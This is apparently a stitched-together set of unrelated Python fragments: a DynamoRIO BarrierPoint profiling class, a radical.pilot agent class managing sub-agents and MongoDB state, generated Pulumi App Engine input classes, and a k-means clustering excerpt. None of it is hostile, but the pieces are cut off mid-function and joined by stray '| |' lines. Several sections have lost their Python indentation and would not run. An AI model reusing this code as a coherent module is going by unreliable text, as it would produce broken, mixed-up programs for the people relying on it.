    :param appParams: application parameter string; a '{}' placeholder is
        substituted with the thread count (see GetBenchParams).
    :param outpath: root directory for generated output files.
    :param out_suffix: optional suffix for the output folder names.
    :param iteration: iteration run number, appended to the folder name.
    :param benchpath: directory containing the benchmark binaries.
    :param drpath: DynamoRIO installation path.
    """
    # Define the logger
    self.logger = logging.getLogger('BarrierPoint')
    # Attributes & properties
    self.miniApp = miniApp          # miniApp name
    self.nthreads = nthreads        # number of threads
    self.iteration = iteration      # iteration run number, append to folder
    # NOTE(review): the next comment appears stale -- no minimum-length
    # attribute is set in this constructor; verify against history.
    # minimum length for barrier points (if 0, no minimum length)
    self.benchpath = benchpath      # Benchmark path
    self.drpath = drpath            # DynamoRIO path
    self.out_suffix = out_suffix    # Suffix for output folders
    self.appParams = self.GetBenchParams(appParams, nthreads)
    # path to store the output files (iteration is zero-padded to 3 digits)
    if out_suffix:
        self._toolOutPath = "{}/{}-{}.{}t/{:0>3d}/".format(
            outpath, miniApp, out_suffix, nthreads, iteration)
    else:
        self._toolOutPath = "{}/{}.{}t/{:0>3d}/".format(
            outpath, miniApp, nthreads, iteration)
    self.BBV_count = None     # output file produced by BBV tool (1)
    self.BBV_inscount = None  # output file produced by BBV tool (2)
    self.LDV_reuse = None     # output file produced by LDV tool (1)
    self.BP = None            # output file produced by combining the above files
    self.selectedBP = None    # output file produced with selected barrier points
@property
def toolOutPath(self):
    # Directory where the instrumentation output files are written.
    return self._toolOutPath

@toolOutPath.setter
def toolOutPath(self, toolOutPath):
    # Allow redirecting the output directory (e.g. fallback to '.').
    self._toolOutPath = toolOutPath
def GetBenchPath(self, benchpath, miniApp):
    """
    Return the path of *miniApp* inside *benchpath*.

    Logs an error and returns None when the application is not present.
    """
    candidate = benchpath + "/" + miniApp
    if os.path.exists(candidate):
        return candidate
    self.logger.error(
        "App \"{}\" not found in benchpath {}".format(miniApp, benchpath))
    return None
def GetBenchParams(self, appParams, nthreads):
    """
    Expand the '{}' placeholder in *appParams* with the thread count.

    Returns *appParams* unchanged when no placeholder is present.
    """
    has_placeholder = "{}" in appParams
    return appParams.format(nthreads) if has_placeholder else appParams
def __CreateVectors(self, dryRun=False):
    """
    Run the DynamoRIO client to obtain the BBV/LDV files for the
    application with the configured thread count.

    Output files are stored in ``toolOutPath``.  With ``dryRun=True`` only
    the output-file attributes are set up (needed for SimPoints) and the
    instrumentation command is not executed.

    :returns: True on success, False when the client library is missing or
        the instrumented run returned a non-zero exit code.
    """
    if not os.path.isdir(self.toolOutPath):
        try:
            os.makedirs(self.toolOutPath)
        except OSError:
            # fall back to the current directory if the path is unusable
            self.logger.warn(
                "CreateVectors could not create output path {}, \
storing results in local folder".format(self.toolOutPath))
            self.toolOutPath = '.'
    # Common prefix for all three instrumentation output files.
    if self.out_suffix:
        _opath = "{}/{}-{}.{}t".format(self.toolOutPath,
                                       self.miniApp, self.out_suffix, self.nthreads)
    else:
        _opath = "{}/{}.{}t".format(self.toolOutPath,
                                    self.miniApp, self.nthreads)
    self.BBV_count = "{}.bbv_count.gz".format(_opath)
    self.BBV_inscount = "{}.bbv_inscount.gz".format(_opath)
    self.LDV_reuse = "{}.ldv_bb.gz".format(_opath)
    # Set the DynamoRIO run command. Requires preload of libbp_dr.so
    if not os.path.isfile("./dynamorio_client/build/libbarrierpoint.so"):
        self.logger.warn(
            "libbarrierpoint.so not found in {}".format("dynamorio_client/build/"))
        return False
    # Pin threads 0..nthreads-1 and preload the barrier-point runtime.
    cmd = 'export LD_PRELOAD={} OMP_NUM_THREADS={} GOMP_CPU_AFFINITY=\"0-{}\"; '.format(
        "./barrierpoint-libs/libbp_dr.so", self.nthreads, self.nthreads - 1)
    cmd += self.drpath + \
        """/bin64/drrun -stderr_mask 15 -c ./dynamorio_client/build/libbarrierpoint.so \
-out_path {} -- {} {}""".format(
            _opath, self.GetBenchPath(self.benchpath, self.miniApp), self.appParams)
    self.logger.debug("Executing command: {}".format(cmd))
    if not dryRun:  # Runs the command
        proc = subprocess.Popen(['bash', '-c', cmd])
        proc.communicate()
        if proc.returncode != 0:
            self.logger.warn(
                "Process {} return {} code".format(cmd, proc.returncode))
            return False
    return True
def __CombineBBVsandLDVs(self):
# Combines the BBVs and LDVs
for fn in [self.BBV_count, self.BBV_inscount, self.LDV_reuse]:
if not os.path.isfile(fn):
self.logger.error(
"Combining BBVs and LDVs: file {} not found".format(fn))
return False
if self.out_suffix:
# output file with BPVs
self.BP = "{}/{}-{}.{}t.bpv.gz".format(
self.toolOutPath, self.miniApp, self.out_suffix, self.nthreads)
# output file the selected BP and weights
self.selectedBP = "{}/{}-{}.{}t.barrierpoints".format(
self.toolOutPath, self.miniApp, self.out_suffix, self.nthreads)
else:
# output file with BPVs
self.BP = "{}/{}.{}t.bpv.gz".format(
self.toolOutPath, self.miniApp, self.nthreads)
# output file the selected BP and weights
self.selectedBP = "{}/{}.{}t.barrierpoints".format(
self.toolOutPath, self.miniApp, self.nthreads)
self.temporalSPfiles = self.selectedBP + '_'
# LDV_reuse file
_bbmax = 0
_total_reuse_per_phase = []
_reuse_data_per_phase = []
try:
_rfile = gzip.open(self.LDV_reuse, 'rt')
self.logger.debug('Reading LDV_reuse: {}'.format(self.LDV_reuse))
_rfile.readline() # skip first line 'W'
for _line in _rfile:
# Line Format: # T:1:43824 :2:4219 :3:4556 :4:527 :5:183 ...
_data = list(map(int, _line.split(':')[1:]))
# odd numbers represent the tread/reuse distance identifier (id)
# and even numbers represent the reuse histogram frequencies (freq)
_bbmax = max(_data[::2] + [_bbmax]) # max of the freq
# skip 'T', get the sum of all the freq
_total_reuse_per_phase.append(sum(_data[1::2]))
_reuse_data_per_phase.append(
zip(_data[::2], _data[1::2])) # tuples (id, freq)
_rfile.close()
except OSError as err:
self.logger.error('{} LDV_reuse: {}'.format(err, self.LDV_reuse))
return False
# BBV_inscount file
self.ins_per_phase = []
try:
_ifile = gzip.open(filename=self.BBV_inscount, mode='rt')
self.logger.debug(
'Reading BBV_inscount: {}'.format(self.BBV_inscount))
_line = _ifile.readline() # it corresponds to the ROI_start = first parallel region
for _line in _ifile:
# list of | |
__copyright__ = 'Copyright 2014-2016, http://radical.rutgers.edu'
__license__ = 'MIT'
import copy
import os
import pprint
import stat
import time
import radical.utils as ru
from .. import utils as rpu
from .. import states as rps
from .. import constants as rpc
from ..db import DBSession
from .resource_manager import ResourceManager
# ------------------------------------------------------------------------------
#
class Agent_0(rpu.Worker):
'''
This is the main agent. It starts sub-agents and watches them. If any of
the sub-agents die, it will shut down the other sub-agents and itself.
This class inherits the rpu.Worker, so that it can use its communication
bridges and callback mechanisms. Specifically, it will pull the DB for
new tasks to be exexuted and forwards them to the agent's component
network (see `work()`). It will also watch the DB for any commands to be
forwarded (pilot termination, task cancelation, etc), and will take care
of heartbeat messages to be sent to the client module. To do all this, it
initializes a DB connection in `initialize()`.
'''
# --------------------------------------------------------------------------
#
def __init__(self, cfg, session):
    """
    Bring up the main agent: profiler, registry service, DB connection,
    resource manager, communication bridges/components, sub-agents and the
    pmgr heartbeat monitor.

    :param cfg: agent configuration (provides pid, pmgr, pilot_sandbox,
        dburl, bridges, agents, ...).
    :param session: the radical.pilot session this agent belongs to.
    """
    self._uid = 'agent.0'
    self._cfg = cfg
    self._pid = cfg.pid
    self._pmgr = cfg.pmgr
    self._pwd = cfg.pilot_sandbox
    self._session = session
    self._log = ru.Logger(self._uid, ns='radical.pilot')
    self._starttime = time.time()
    self._final_cause = None
    # this is the earliest point to sync bootstrap and agent profiles
    self._prof = ru.Profiler(ns='radical.pilot', name=self._uid)
    self._prof.prof('hostname', uid=cfg.pid, msg=ru.get_hostname())
    # run an inline registry service to share runtime config with other
    # agents and components
    reg_uid = 'radical.pilot.reg.%s' % self._uid
    self._reg_service = ru.zmq.Registry(uid=reg_uid)
    self._reg_service.start()
    # let all components know where to look for the registry
    self._cfg['reg_addr'] = self._reg_service.addr
    # connect to MongoDB for state push/pull
    self._connect_db()
    # configure ResourceManager before component startup, as components need
    # ResourceManager information for function (scheduler, executor)
    self._configure_rm()
    # ensure that app communication channels are visible to workload
    self._configure_app_comm()
    # expose heartbeat channel to sub-agents, bridges and components,
    # and start those
    self._cmgr = rpu.ComponentManager(self._cfg)
    self._cfg.heartbeat = self._cmgr.cfg.heartbeat
    self._cmgr.start_bridges()
    self._cmgr.start_components()
    # start any services if they are requested
    self._start_services()
    # create the sub-agent configs and start the sub agents
    self._write_sa_configs()
    self._start_sub_agents()   # TODO: move to cmgr?
    # at this point the session is up and connected, and it should have
    # brought up all communication bridges and components.  We are
    # ready to rumble!
    rpu.Worker.__init__(self, self._cfg, session)
    self.register_subscriber(rpc.CONTROL_PUBSUB, self._check_control)
    # run our own slow-paced heartbeat monitor to watch pmgr heartbeats
    # FIXME: we need to get pmgr freq
    freq = 60
    tint = freq / 3
    tout = freq * 10
    self._hb = ru.Heartbeat(uid=self._uid,
                            timeout=tout,
                            interval=tint,
                            beat_cb=self._hb_check,  # no own heartbeat(pmgr pulls)
                            term_cb=self._hb_term_cb,
                            log=self._log)
    self._hb.start()
    # register pmgr heartbeat
    self._log.info('hb init for %s', self._pmgr)
    self._hb.beat(uid=self._pmgr)
# --------------------------------------------------------------------------
#
def _hb_check(self):
    # Periodic heartbeat callback: only log -- the pmgr pulls our state,
    # we do not send heartbeats ourselves.
    self._log.debug('hb check')
# --------------------------------------------------------------------------
#
def _hb_term_cb(self, msg=None):
    # Invoked when the pmgr heartbeat times out: shut down the component
    # manager and log the reason.
    self._cmgr.close()
    self._log.warn('hb termination: %s', msg)
    return None
# --------------------------------------------------------------------------
#
def _connect_db(self):
    """
    Open the MongoDB session used for state push/pull.
    """
    # Check for the RADICAL_PILOT_DB_HOSTPORT env var, which will hold
    # the address of the tunnelized DB endpoint. If it exists, we
    # overrule the agent config with it.
    hostport = os.environ.get('RADICAL_PILOT_DB_HOSTPORT')
    if hostport:
        # split only on the first ':' so IPv6-ish values keep their port
        host, port = hostport.split(':', 1)
        dburl = ru.Url(self._cfg.dburl)
        dburl.host = host
        dburl.port = port
        self._cfg.dburl = str(dburl)
    self._dbs = DBSession(sid=self._cfg.sid, dburl=self._cfg.dburl,
                          cfg=self._cfg, log=self._log)
# --------------------------------------------------------------------------
#
def _configure_rm(self):
    """
    Instantiate the ResourceManager for this pilot.
    """
    # Create ResourceManager which will give us the set of agent_nodes to
    # use for sub-agent startup. Add the remaining ResourceManager
    # information to the config, for the benefit of the scheduler).
    self._rm = ResourceManager.create(name=self._cfg.resource_manager,
                                      cfg=self._cfg, log=self._log,
                                      prof=self._prof)
    self._log.debug(pprint.pformat(self._rm.info))
# --------------------------------------------------------------------------
#
def _configure_app_comm(self):
# if the pilot description contains a request for application comm
# channels, merge those into the agent config
#
# FIXME: this needs to start the app_comm bridges
app_comm = self._cfg.get('app_comm')
if app_comm:
if isinstance(app_comm, list):
app_comm = {ac: {'bulk_size': 0,
'stall_hwm': 1,
'log_level': 'error'} for ac in app_comm}
for ac in app_comm:
if ac in self._cfg['bridges']:
raise ValueError('reserved app_comm name %s' % ac)
self._cfg['bridges'][ac] = app_comm[ac]
# some of the bridge addresses also need to be exposed to the workload
if app_comm:
if 'task_environment' not in self._cfg:
self._cfg['task_environment'] = dict()
for ac in app_comm:
if ac not in self._cfg['bridges']:
raise RuntimeError('missing app_comm %s' % ac)
self._cfg['task_environment']['RP_%s_IN' % ac.upper()] = \
self._cfg['bridges'][ac]['addr_in']
self._cfg['task_environment']['RP_%s_OUT' % ac.upper()] = \
self._cfg['bridges'][ac]['addr_out']
# --------------------------------------------------------------------------
#
def initialize(self):
    """
    Register output queues and timed DB-polling callbacks, then advance
    the pilot state to PMGR_ACTIVE.
    """
    # registers the staging_input_queue as this is what we want to push
    # tasks to
    self.register_output(rps.AGENT_STAGING_INPUT_PENDING,
                         rpc.AGENT_STAGING_INPUT_QUEUE)
    # register the command callback which pulls the DB for commands
    self.register_timed_cb(self._agent_command_cb,
                           timer=self._cfg['db_poll_sleeptime'])
    # register idle callback to pull for tasks
    self.register_timed_cb(self._check_tasks_cb,
                           timer=self._cfg['db_poll_sleeptime'])
    # sub-agents are started, components are started, bridges are up: we are
    # ready to roll!  Update pilot state.
    pilot = {'type'             : 'pilot',
             'uid'              : self._pid,
             'state'            : rps.PMGR_ACTIVE,
             'resource_details' : {
                 # 'lm_info'    : self._rm.lm_info.get('version_info'),
                 # 'lm_detail'  : self._rm.lm_info.get('lm_detail'),
                 'rm_info'      : self._rm.info},
             '$set'             : ['resource_details']}
    self.advance(pilot, publish=True, push=False)
# --------------------------------------------------------------------------
#
def work(self):
    # all work is done in the registered callbacks -- just idle here
    time.sleep(1)
# --------------------------------------------------------------------------
#
def stage_output(self):
    """
    Tar up the files listed in ./staging_output.txt into
    ./staging_output.tgz (once; skipped when the tarball already exists).
    """
    if os.path.isfile('./staging_output.txt'):
        if not os.path.isfile('./staging_output.tgz'):
            cmd = 'tar zcvf staging_output.tgz $(cat staging_output.txt)'
            out, err, ret = ru.sh_callout(cmd, shell=True)
            if ret:
                # log but do not raise -- staging failure must not abort
                # the agent's shutdown path (see finalize)
                self._log.debug('out: %s', out)
                self._log.debug('err: %s', err)
                self._log.error('output tarring failed: %s', cmd)
# --------------------------------------------------------------------------
#
def finalize(self):
    """
    Tear the agent down: stage output data, stop heartbeat / components /
    resource manager / registry, signal the bootstrapper with the final
    pilot state, and push last stdout/stderr/log snippets to the DB.
    """
    # tar up output staging data
    self._log.debug('stage output parent')
    self.stage_output()
    # tear things down in reverse order
    self._hb.stop()
    self._cmgr.close()
    if self._rm:
        self._rm.stop()
    self._reg_service.stop()
    # map the recorded termination cause onto a final pilot state
    if self._final_cause == 'timeout' : state = rps.DONE
    elif self._final_cause == 'cancel' : state = rps.CANCELED
    elif self._final_cause == 'sys.exit' : state = rps.CANCELED
    else : state = rps.FAILED
    # NOTE: we do not push the final pilot state, as that is done by the
    # bootstrapper *after* this pilot *actually* finished.
    with ru.ru_open('./killme.signal', 'w') as fout:
        fout.write('%s\n' % state)
    # we don't rely on the existence / viability of the update worker at
    # that point.
    self._log.debug('update db state: %s: %s', state, self._final_cause)
    self._log.info('rusage: %s', rpu.get_rusage())
    out, err, log = '', '', ''
    # best-effort: snapshot the first 1kB of the agent's out/err/log files;
    # the bare excepts are deliberate -- nothing here may abort finalization
    try : out = ru.ru_open('./agent.0.out', 'r').read(1024)
    except: pass
    try : err = ru.ru_open('./agent.0.err', 'r').read(1024)
    except: pass
    try : log = ru.ru_open('./agent.0.log', 'r').read(1024)
    except: pass
    ret = self._dbs._c.update({'type' : 'pilot',
                               'uid' : self._pid},
                              {'$set' : {'stdout' : rpu.tail(out),
                                         'stderr' : rpu.tail(err),
                                         'logfile': rpu.tail(log),
                                         'state' : state},
                               '$push': {'states' : state}
                              })
    self._log.debug('update ret: %s', ret)
# --------------------------------------------------------------------
#
def _write_sa_configs(self):
    """
    Write one config file per sub-agent (``<sa>.cfg``), derived from this
    agent's config with the agents/components/bridges sections replaced by
    the sub-agent's own layout.
    """
    # we have all information needed by the subagents -- write the
    # sub-agent config files.
    # write deep-copies of the config for each sub-agent (sans from agent.0)
    for sa in self._cfg.get('agents', {}):
        # NOTE(review): assert is stripped under 'python -O'; consider an
        # explicit raise if this invariant must hold in production.
        assert(sa != 'agent.0'), 'expect subagent, not agent.0'
        # use our own config sans agents/components/bridges as a basis for
        # the sub-agent config.
        tmp_cfg = copy.deepcopy(self._cfg)
        tmp_cfg['agents'] = dict()
        tmp_cfg['components'] = dict()
        tmp_cfg['bridges'] = dict()
        # merge sub_agent layout into the config
        ru.dict_merge(tmp_cfg, self._cfg['agents'][sa], ru.OVERWRITE)
        tmp_cfg['uid'] = sa
        tmp_cfg['aid'] = sa
        tmp_cfg['owner'] = 'agent.0'
        ru.write_json(tmp_cfg, './%s.cfg' % sa)
# --------------------------------------------------------------------------
#
def _start_services(self):
'''
If a `./services` file exist, reserve a compute node and run that file
there as bash script.
'''
if not os.path.isfile('./services'):
return
# launch the `./services` script on the service node reserved by the RM.
nodes = self._rm.info.service_node_list
assert(nodes)
bs_name = "%s/bootstrap_2.sh" % self._pwd
ls_name = "%s/services_launch.sh" % self._pwd
ex_name = "%s/services_exec.sh" % self._pwd
threads = self._rm.info.cores_per_node * \
self._rm.info.threads_per_core
service_task = {
'uid' : 'rp.services',
'task_sandbox_path': self._pwd,
'description' : {'cpu_processes' : 1,
'cpu_threads' : threads,
'gpu_processes' : 0,
'gpu_threads' : 0,
'executable' : '/bin/sh',
'arguments' : [bs_name, 'services']},
'slots': {'ranks' : [{'node_name' : nodes[0]['node_name'],
'node_id' : nodes[0]['node_id'],
'core_map' : [[0]],
'gpu_map' : [],
'lfs' : 0,
'mem' : 0}]}
}
launcher = self._rm.find_launcher(service_task)
if not launcher:
raise RuntimeError('no launch method found for sub agent')
tmp = '#!/bin/sh\n\n'
cmds = launcher.get_launcher_env()
for cmd in cmds:
tmp += '%s || exit 1\n' % cmd
cmds = launcher.get_launch_cmd(service_task, ex_name)
tmp += '%s\nexit $?\n\n' % '\n'.join(cmds)
with ru.ru_open(ls_name, 'w') as fout:
fout.write(tmp)
tmp = '#!/bin/sh\n\n'
tmp += '. ./env/service.env\n'
tmp += '/bin/sh -l ./services\n\n'
with ru.ru_open(ex_name, 'w') as fout:
fout.write(tmp)
# make sure scripts are executable
st = os.stat(ls_name)
st = os.stat(ex_name)
os.chmod(ls_name, st.st_mode | stat.S_IEXEC)
os.chmod(ex_name, st.st_mode | | |
text/html.
"""
return pulumi.get(self, "mime_type")
@mime_type.setter
def mime_type(self, value: Optional[pulumi.Input[str]]):
    # Update the MIME type used when serving this error response.
    pulumi.set(self, "mime_type", value)
@property
@pulumi.getter(name="staticFile")
def static_file(self) -> Optional[pulumi.Input[str]]:
    """
    Static file content to be served for this error.
    """
    return pulumi.get(self, "static_file")

@static_file.setter
def static_file(self, value: Optional[pulumi.Input[str]]):
    # Update the static file content served for this error.
    pulumi.set(self, "static_file", value)
@pulumi.input_type
class FeatureSettingsArgs:
    def __init__(__self__, *,
                 split_health_checks: Optional[pulumi.Input[bool]] = None,
                 use_container_optimized_os: Optional[pulumi.Input[bool]] = None):
        """
        The feature specific settings to be used in the application. These define behaviors that are user configurable.
        :param pulumi.Input[bool] split_health_checks: Boolean value indicating if split health checks should be used instead of the legacy health checks. At an app.yaml level, this means defaulting to 'readiness_check' and 'liveness_check' values instead of 'health_check' ones. Once the legacy 'health_check' behavior is deprecated, and this value is always true, this setting can be removed.
        :param pulumi.Input[bool] use_container_optimized_os: If true, use Container-Optimized OS (https://cloud.google.com/container-optimized-os/) base image for VMs, rather than a base Debian image.
        """
        # Only record explicitly supplied values; None means "not set".
        supplied = (("split_health_checks", split_health_checks),
                    ("use_container_optimized_os", use_container_optimized_os))
        for attr, val in supplied:
            if val is not None:
                pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter(name="splitHealthChecks")
    def split_health_checks(self) -> Optional[pulumi.Input[bool]]:
        """
        Boolean value indicating if split health checks should be used instead of the legacy health checks. At an app.yaml level, this means defaulting to 'readiness_check' and 'liveness_check' values instead of 'health_check' ones. Once the legacy 'health_check' behavior is deprecated, and this value is always true, this setting can be removed.
        """
        return pulumi.get(self, "split_health_checks")

    @split_health_checks.setter
    def split_health_checks(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "split_health_checks", value)

    @property
    @pulumi.getter(name="useContainerOptimizedOs")
    def use_container_optimized_os(self) -> Optional[pulumi.Input[bool]]:
        """
        If true, use Container-Optimized OS (https://cloud.google.com/container-optimized-os/) base image for VMs, rather than a base Debian image.
        """
        return pulumi.get(self, "use_container_optimized_os")

    @use_container_optimized_os.setter
    def use_container_optimized_os(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "use_container_optimized_os", value)
@pulumi.input_type
class HealthCheckArgs:
    def __init__(__self__, *,
                 check_interval: Optional[pulumi.Input[str]] = None,
                 disable_health_check: Optional[pulumi.Input[bool]] = None,
                 healthy_threshold: Optional[pulumi.Input[int]] = None,
                 host: Optional[pulumi.Input[str]] = None,
                 restart_threshold: Optional[pulumi.Input[int]] = None,
                 timeout: Optional[pulumi.Input[str]] = None,
                 unhealthy_threshold: Optional[pulumi.Input[int]] = None):
        """
        Health checking configuration for VM instances. Unhealthy instances are killed and replaced with new instances. Only applicable for instances in App Engine flexible environment.
        :param pulumi.Input[str] check_interval: Interval between health checks.
        :param pulumi.Input[bool] disable_health_check: Whether to explicitly disable health checks for this instance.
        :param pulumi.Input[int] healthy_threshold: Number of consecutive successful health checks required before receiving traffic.
        :param pulumi.Input[str] host: Host header to send when performing an HTTP health check. Example: "myapp.appspot.com"
        :param pulumi.Input[int] restart_threshold: Number of consecutive failed health checks required before an instance is restarted.
        :param pulumi.Input[str] timeout: Time before the health check is considered failed.
        :param pulumi.Input[int] unhealthy_threshold: Number of consecutive failed health checks required before removing traffic.
        """
        # Only record explicitly supplied values; None means "not set".
        supplied = (("check_interval", check_interval),
                    ("disable_health_check", disable_health_check),
                    ("healthy_threshold", healthy_threshold),
                    ("host", host),
                    ("restart_threshold", restart_threshold),
                    ("timeout", timeout),
                    ("unhealthy_threshold", unhealthy_threshold))
        for attr, val in supplied:
            if val is not None:
                pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter(name="checkInterval")
    def check_interval(self) -> Optional[pulumi.Input[str]]:
        """
        Interval between health checks.
        """
        return pulumi.get(self, "check_interval")

    @check_interval.setter
    def check_interval(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "check_interval", value)

    @property
    @pulumi.getter(name="disableHealthCheck")
    def disable_health_check(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to explicitly disable health checks for this instance.
        """
        return pulumi.get(self, "disable_health_check")

    @disable_health_check.setter
    def disable_health_check(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "disable_health_check", value)

    @property
    @pulumi.getter(name="healthyThreshold")
    def healthy_threshold(self) -> Optional[pulumi.Input[int]]:
        """
        Number of consecutive successful health checks required before receiving traffic.
        """
        return pulumi.get(self, "healthy_threshold")

    @healthy_threshold.setter
    def healthy_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "healthy_threshold", value)

    @property
    @pulumi.getter
    def host(self) -> Optional[pulumi.Input[str]]:
        """
        Host header to send when performing an HTTP health check. Example: "myapp.appspot.com"
        """
        return pulumi.get(self, "host")

    @host.setter
    def host(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host", value)

    @property
    @pulumi.getter(name="restartThreshold")
    def restart_threshold(self) -> Optional[pulumi.Input[int]]:
        """
        Number of consecutive failed health checks required before an instance is restarted.
        """
        return pulumi.get(self, "restart_threshold")

    @restart_threshold.setter
    def restart_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "restart_threshold", value)

    @property
    @pulumi.getter
    def timeout(self) -> Optional[pulumi.Input[str]]:
        """
        Time before the health check is considered failed.
        """
        return pulumi.get(self, "timeout")

    @timeout.setter
    def timeout(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "timeout", value)

    @property
    @pulumi.getter(name="unhealthyThreshold")
    def unhealthy_threshold(self) -> Optional[pulumi.Input[int]]:
        """
        Number of consecutive failed health checks required before removing traffic.
        """
        return pulumi.get(self, "unhealthy_threshold")

    @unhealthy_threshold.setter
    def unhealthy_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "unhealthy_threshold", value)
@pulumi.input_type
class IdentityAwareProxyArgs:
    def __init__(__self__, *,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 oauth2_client_id: Optional[pulumi.Input[str]] = None,
                 oauth2_client_secret: Optional[pulumi.Input[str]] = None):
        """
        Identity-Aware Proxy
        :param pulumi.Input[bool] enabled: Whether the serving infrastructure will authenticate and authorize all incoming requests.If true, the oauth2_client_id and oauth2_client_secret fields must be non-empty.
        :param pulumi.Input[str] oauth2_client_id: OAuth2 client ID to use for the authentication flow.
        :param pulumi.Input[str] oauth2_client_secret: OAuth2 client secret to use for the authentication flow.For security reasons, this value cannot be retrieved via the API. Instead, the SHA-256 hash of the value is returned in the oauth2_client_secret_sha256 field.@InputOnly
        """
        # Store only the arguments that were explicitly supplied; unset
        # fields remain absent from the pulumi input bag.
        for key, value in (("enabled", enabled),
                           ("oauth2_client_id", oauth2_client_id),
                           ("oauth2_client_secret", oauth2_client_secret)):
            if value is not None:
                pulumi.set(__self__, key, value)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the serving infrastructure will authenticate and authorize all incoming requests.If true, the oauth2_client_id and oauth2_client_secret fields must be non-empty.
        """
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter(name="oauth2ClientId")
    def oauth2_client_id(self) -> Optional[pulumi.Input[str]]:
        """
        OAuth2 client ID to use for the authentication flow.
        """
        return pulumi.get(self, "oauth2_client_id")
    @oauth2_client_id.setter
    def oauth2_client_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "oauth2_client_id", value)
    @property
    @pulumi.getter(name="oauth2ClientSecret")
    def oauth2_client_secret(self) -> Optional[pulumi.Input[str]]:
        """
        OAuth2 client secret to use for the authentication flow.For security reasons, this value cannot be retrieved via the API. Instead, the SHA-256 hash of the value is returned in the oauth2_client_secret_sha256 field.@InputOnly
        """
        return pulumi.get(self, "oauth2_client_secret")
    @oauth2_client_secret.setter
    def oauth2_client_secret(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "oauth2_client_secret", value)
@pulumi.input_type
class LibraryArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[str]] = None,
                 version: Optional[pulumi.Input[str]] = None):
        """
        Third-party Python runtime library that is required by the application.
        :param pulumi.Input[str] name: Name of the library. Example: "django".
        :param pulumi.Input[str] version: Version of the library to select, or "latest".
        """
        # Record only explicitly-provided fields.
        for key, value in (("name", name), ("version", version)):
            if value is not None:
                pulumi.set(__self__, key, value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the library. Example: "django".
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[str]]:
        """
        Version of the library to select, or "latest".
        """
        return pulumi.get(self, "version")
    @version.setter
    def version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "version", value)
@pulumi.input_type
class LivenessCheckArgs:
def __init__(__self__, *,
check_interval: Optional[pulumi.Input[str]] = None,
failure_threshold: Optional[pulumi.Input[int]] = None,
host: Optional[pulumi.Input[str]] = None,
initial_delay: Optional[pulumi.Input[str]] = None,
path: Optional[pulumi.Input[str]] = None,
success_threshold: Optional[pulumi.Input[int]] = None,
timeout: Optional[pulumi.Input[str]] = None):
"""
Health checking configuration for VM instances. Unhealthy instances are killed and replaced with new instances.
:param pulumi.Input[str] check_interval: Interval between health checks.
:param pulumi.Input[int] failure_threshold: Number of consecutive failed checks required before considering the VM unhealthy.
:param pulumi.Input[str] host: Host header to send when performing a HTTP Liveness check. Example: "myapp.appspot.com"
:param pulumi.Input[str] initial_delay: The initial delay before starting to execute the checks.
:param pulumi.Input[str] path: The request path.
:param pulumi.Input[int] success_threshold: Number of consecutive successful checks required before considering the VM healthy.
:param pulumi.Input[str] timeout: Time before the check is considered failed.
"""
if check_interval is not None:
pulumi.set(__self__, "check_interval", check_interval)
if failure_threshold is not None:
pulumi.set(__self__, "failure_threshold", failure_threshold)
if host is not None:
pulumi.set(__self__, "host", host)
if initial_delay is not None:
pulumi.set(__self__, "initial_delay", initial_delay)
if path is not None:
pulumi.set(__self__, "path", path)
if success_threshold is not None:
pulumi.set(__self__, "success_threshold", success_threshold)
if timeout is not None:
pulumi.set(__self__, "timeout", timeout)
    # NOTE: machine-generated pulumi accessor pairs (getter reads the stored
    # input via pulumi.get(), setter writes via pulumi.set()).
    @property
    @pulumi.getter(name="checkInterval")
    def check_interval(self) -> Optional[pulumi.Input[str]]:
        """
        Interval between health checks.
        """
        return pulumi.get(self, "check_interval")
    @check_interval.setter
    def check_interval(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "check_interval", value)
    @property
    @pulumi.getter(name="failureThreshold")
    def failure_threshold(self) -> Optional[pulumi.Input[int]]:
        """
        Number of consecutive failed checks required before considering the VM unhealthy.
        """
        return pulumi.get(self, "failure_threshold")
    @failure_threshold.setter
    def failure_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "failure_threshold", value)
    @property
    @pulumi.getter
    def host(self) -> Optional[pulumi.Input[str]]:
        """
        Host header to send when performing a HTTP Liveness check. Example: "myapp.appspot.com"
        """
        return pulumi.get(self, "host")
    @host.setter
    def host(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host", value)
@property
@pulumi.getter(name="initialDelay")
def initial_delay(self) -> Optional[pulumi.Input[str]]:
"""
| |
i, v in enumerate(sorted(vectors, key=lambda x: random())):
# Randomly partition the vectors across k clusters.
clusters[i % int(k)].append(v)
# Cache the distance calculations between vectors (4x faster).
map = DistanceMap(method=distance); distance = map.distance
converged = False
while not converged and iterations > 0 and k > 0:
# Calculate the center of each cluster.
centroids = [centroid(cluster, keys) for cluster in clusters]
# Triangle inequality: one side is shorter than the sum of the two other sides.
# We can exploit this to avoid costly distance() calls (up to 3x faster).
p = 0.5 * kwargs.get("p", 0.8) # "Relaxed" triangle inequality (cosine distance is a semimetric) 0.25-0.5.
D = {}
for i in range(len(centroids)):
